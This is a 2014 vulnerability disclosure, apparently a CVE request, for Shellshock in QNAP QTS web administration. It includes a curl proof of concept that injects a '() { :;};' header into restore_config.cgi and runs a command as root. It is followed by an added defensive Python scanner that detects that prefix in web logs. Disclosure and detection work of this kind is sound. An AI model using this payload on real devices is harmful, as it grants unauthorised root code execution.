Date: Mon, 29 Sep 2014 09:49:42 +0800
From: Ken Lee <>
Subject: CVE request: QNAP QTS


QNAP QTS [1] employs Bash as the default shell, and we discovered an arbitrary
code execution flaw with UID=0 via `Web administration'.
The PoC is shown below:

> $ curl -A '() { :;}; echo Content-Type: text/html; echo; echo
> `/usr/bin/id`' http://QNAP_QTS:8080/cgi-bin/restore_config.cgi
> *uid=0(admin) gid=0(administrators)*
> HTTP/1.1 200 OK

{ "authPassed": 1, "Result": 0 }

This issue has been acknowledged [2] by QNAP and if not assigned yet,
please help to arrange a CVE identifier for this issue.
Thank you, and have a nice day.
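
A defender-side check for the request pattern in the PoC above, as an added example that is not part of the original post: it scans web access logs for the Bash function-definition prefix `() {` in the request line, Referer or User-Agent. It assumes the server writes Apache combined-format logs; `scan`, `COMBINED`, `FUNC_DEF` and the sample lines are constructed for illustration.

```python
import re

# Apache/NCSA "combined" format (assumed):
#   ip ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Bash function-definition prefix "() {", tolerating whitespace between tokens.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Sep/2014:09:40:01 +0800] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.77 - - [29/Sep/2014:09:41:13 +0800] "GET /cgi-bin/restore_config.cgi HTTP/1.1" 200 34 "-" "() { :;}; echo Content-Type: text/html"',
    '192.0.2.78 - - [29/Sep/2014:09:42:55 +0800] "GET /index.html HTTP/1.1" 404 210 "()  { x; }; true" "curl/7.38.0"',
]

def scan(lines):
    """Return one finding per log line whose header fields carry the prefix."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        fields = [f for f in ("request", "referer", "agent")
                  if FUNC_DEF.search(m.group(f))]
        if not fields:
            continue
        parts = m.group("request").split()
        path = parts[1] if len(parts) > 1 else ""
        findings.append({
            "line": lineno, "ip": m.group("ip"), "path": path,
            "fields": fields, "status": int(m.group("status")),
            # CGI handlers receive headers as environment variables.
            "cgi": "/cgi-bin/" in path,
        })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit records an attempt only; whether Bash evaluated the header depends on the handler behind the path and the Bash version installed.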

